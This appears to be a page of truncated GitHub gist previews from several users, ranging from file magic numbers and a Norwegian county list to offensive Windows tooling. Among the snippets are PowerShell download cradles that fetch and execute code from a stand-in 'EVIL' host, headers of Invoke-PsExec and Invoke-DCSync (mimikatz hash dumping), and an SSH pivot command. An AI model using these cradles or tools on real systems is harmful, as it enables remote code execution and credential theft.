leommoore

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

tatanus

Command to run:
ssh -L 2222:localhost:8501 [email protected]

where 2222 is the local port mapping it can be any number above 1000

where localhost must be set to localhost and refers to your current connection

where 8501 is the port you will be opening up on the remote machine

where [email protected] is the first hop in your quest for internal access

Phaeilo

#!/bin/bash

# The MIT License (MIT)
#
# Copyright (c) 2015 Philip Huppert
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of

JonTheNiceGuy

Sub test()
    Dim SourceString As String
    Dim InterimString As String
    
    Dim DestinationString As String
    
    SourceString = ""
    InterimString = ""
    DestinationString = ""
    Do Until Len(SourceString) > 220

Meatballs1

using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

HarmJ0y

function Invoke-PsExec {
    <#
    .SYNOPSIS
    This function is a rough port of Metasploit's psexec functionality.
    It utilizes Windows API calls to open up the service manager on
    a remote machine, creates/run a service with an associated binary
    path or command, and then cleans everything up.

    Either a -Command or a custom -ServiceEXE can be specified.
    For -Commands, a -ResultsFile can also be specified to retrieve the

eiriks

["Østfold","Akershus","Oslo","Hedmark","Oppland","Buskerud","Vestfold","Telemark","Aust-Agder","Vest-Agder","Rogaland","Hordaland","Sogn og Fjordane","Møre og Romsdal","Sør-Trøndelag","Nord-Trøndelag","Trøndelag","Nordland","Troms","Finnmark","Svalbard","Jan Mayen","Kontinentalsokkelen"]

HarmJ0y

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

eldondev

wget -nc http://ftp.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
wget -nc http://ftp.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
cp -nv ~/.ssh/id_rsa.pub .
qemu-system-x86_64 -machine accel=kvm -kernel linux -initrd initrd.gz -m 1G -smp 2 -append "blacklist=vga16fb fb=false video=false vga=normal auto=true url=http://10.0.2.10:8080/debian-preseed.txt hostname=otto domain=" -net user,guestfwd=:10.0.2.10:8080-cmd:"/bin/busybox httpd -i" -hda /dev/shm/deb.img -net nic -display none

monoxgas

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y